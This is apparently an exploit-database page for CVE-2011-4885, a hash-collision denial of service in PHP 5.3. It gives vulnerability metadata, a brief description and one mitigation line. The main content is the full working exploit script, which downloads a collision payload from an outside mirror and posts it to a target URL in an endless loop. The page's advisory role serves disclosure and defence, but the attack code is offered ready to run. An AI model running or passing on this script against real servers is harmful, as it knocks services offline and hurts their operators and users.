header-logo
Suggest Exploit
vendor:
PHP
by:
infodox
7.5
CVSS
HIGH
Denial of Service
693
CWE
Product Name: PHP
Affected Version From: 5.3.*
Affected Version To: 5.3.*
Patch Exists: NO
Related CWE: CVE-2011-4885
CPE: a:php:php:5.3
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-1358-1/https://www.rapid7.com/db/vulnerabilities/php-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/apple-osx-loginwindow-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2012-41/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0093/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0092/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/debian-DSA-2403/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2012-0093/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-3fd040be-4f0b-11e1-9e32-0025900931f8/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2012-0092/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-4885/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2011-4885/https://www.rapid7.com/db/?q=CVE-2011-4885&type=&page=2https://www.rapid7.com/db/?q=CVE-2011-4885&type=&page=2
Other Scripts:
Platforms Tested: Linux
2011

CVE-2011-4885 PHP Hashtables Denial of Service

This exploit targets a vulnerability in PHP version 5.3.* which allows an attacker to perform a denial of service attack. The exploit utilizes hash collisions to overload the system and cause it to crash.

Mitigation:

Upgrade to a patched version of PHP or implement proper input validation to prevent hash collisions.
Source

Exploit-DB raw data:

  

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service
Exploit
 # Date: 1/1/12
 # Author: infodox
 # Software Link: php.net
 #
Version: 5.3.*
 # Tested on: Linux
 # CVE : CVE-2011-4885 

Exploit
Download -- http://infodox.co.cc/Downloads/phpdos.txt 

<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt)
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>